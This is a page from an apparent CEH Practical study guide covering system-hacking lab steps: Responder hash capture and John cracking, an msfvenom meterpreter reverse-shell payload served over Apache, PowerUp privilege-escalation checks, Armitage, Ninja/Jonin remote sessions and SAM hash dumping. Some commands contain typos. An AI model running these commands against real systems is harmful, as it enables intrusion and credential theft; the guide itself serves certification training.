CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. Perform Active Online Attack to Crack the System’s Password using Responder
  • 2. Audit system passwords using Lophtcrack
  • 3. Find Vulnerabilities on exploit sites
  • 4. Gain Access to a Remote System using Reverse Shell Generator
  • 5. Gain access to a system using armitage
  • 6. Gain access to system using Ninja Jonin
  • 7. Buffer Overflow
  • 8. System Password hacking

Was this helpful?

  1. Module 6. System Hacking

1. Gain access to the system

PreviousModule 6. System HackingNext2. Privilege Escalation

Last updated 7 months ago

Was this helpful?

1. Perform Active Online Attack to Crack the System’s Password using Responder

LLMNR (link local multicast name resolution) and NBT-NS (netbios namer service) are used to performe name resolution on the local link.

Responder is LLMNR, NBT-NS, MDNS poisoner. By default the tool only responds to SMB.

check the interfaces

ifconfig

Now run responder on the interface.

sudo responder -I ens33

Now when a user on the LAN try to access the unavailable share, responder will capture the hash.

logs are stored in /usr/share/responder folder. We will have a hash. Now crack it with John.

on ubuntu you can install john as 

sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt

2. Audit system passwords using Lophtcrack

windows tool. Can crack other password on remote machine if you know a single account utilizing SMB. Use password auditing. use password auditing wizard.

3. Find Vulnerabilities on exploit sites

4. Gain Access to a Remote System using Reverse Shell Generator

create msfvenom payload

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.ex

using apache to transfer the file

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chmod -R www-data:www-data /var/www/html/share
service apche2 start

Now run msfconsole 

msfconsole
use exploit/multi/handler

set the payload type, port and IP and visit the IP to download the executable. Run it you will get the shell

You can run the following commands in meterpreter.

sysinfo  //get system information

upload file through meterpreter

the powersploit priv escaltion script./usr/share/windows-resources/powersploit

upload PowerUp.ps1 powerup.ps1

Now get shell

shell

Now execute the script

powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;invoke-All-Checks"

Now exit it and to get a VNC from meterpreter use the following command.

run vnc

5. Gain access to a system using armitage

GUI based msf

service postgresql start

Now run armitage from Applications menu. Run intense scan. and then we can create a payload according to our target.

Once the victim opens the payload, we get the session.

6. Gain access to system using Ninja Jonin

Ninja is installed on target and Jonin on attacker machine.

We need to edit its config file to change the ip and port.

Open the Jonin listenere. it will catch the sessions.

list  //to list all sessions
connect 1 //to connect to session
//to get to cmd
change
cmd
help //displays help

7. Buffer Overflow

Tools required

8. System Password hacking

# To Dump Windows SAM file hashes
pwDump7.exe> hashes.txt
L0phtCrack
Offensive Security’s Exploit Database Archive
Logo
Online - Reverse Shell Generator
Also try different shells from rev shells
Logo
GitHub - ErAz7/Ninja: A general-purpose fully customizable software to control a remote computer behind any NAT, Firewall and proxy. Providing secure shell access, file transfer and shell stream (stream shell output from remote to a local file). Ninja has no prerequisites, you can just download the release and use it right away!GitHub
Simple Stack Based Buffer Overflow Tutorial for Vulnserver · The Grey Corner
Buffer Overflow | Pentesting Quick Reference OSCP and Beyond
Follow the detailed tutorial
GitHub - stephenbradshaw/vulnserver: Vulnerable server used for learning software exploitationGitHub
LLMNR is layer 2 UDP 5355. netbios-ns port 137
https://debugger.immunityinc.com/
Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
CEH Practical Course
Logo
Logo
Logo
Logo
Logo